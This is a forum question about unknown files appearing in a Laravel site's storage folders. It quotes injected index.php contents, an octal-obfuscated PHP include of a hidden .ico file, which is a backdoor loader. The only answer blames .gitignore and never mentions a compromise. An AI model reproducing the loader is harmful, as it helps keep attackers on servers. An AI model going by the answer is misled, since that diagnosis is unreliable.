# Getting new files on public and storage folders on production

Tags: php, laravel, server, production-environment

I have deployed a Laravel application with Nginx on Ubuntu (on Digital Ocean).

After the deployment to the server, for some unknown reasons, I noticed that some unknown files are generated under public and storage folders.

When I type "git status", the following files are those untracked files that I didn't add. Does anyone have any prior experience in such a situation in which certain unknown files are generated in public and storage folders?

```
storage/app/.dea43f5e.ico
storage/app/index.php
storage/framework/index.php
storage/index.php
storage/uploads/avatar.217f78dc.ico
storage/uploads/index.php
```

And index files contain the following contents.

/*ea938*/

@include "\057va\162/w\167w/\150tm\154/e\156st\157nL\145dg\145r/\141cc\157un\164go\057ma\151n_\146il\145/p\165bl\151c/\163to\162ag\145/l\157gs\057.f\06040\06643\064.i\143o";

/*ea938*/

Comment: What have you tried to resolve the problem? What do these files contain?

Answer (score 0):

In your project folder, you have a file by the name of `.gitignore`, I think your storage folder is ignored and you can remove your storage folder from that file.

**.gitignore**

```
/node_modules
/public/storage
/storage/*.key
/vendor
```

Remove your `/storage` from `.gitignore`.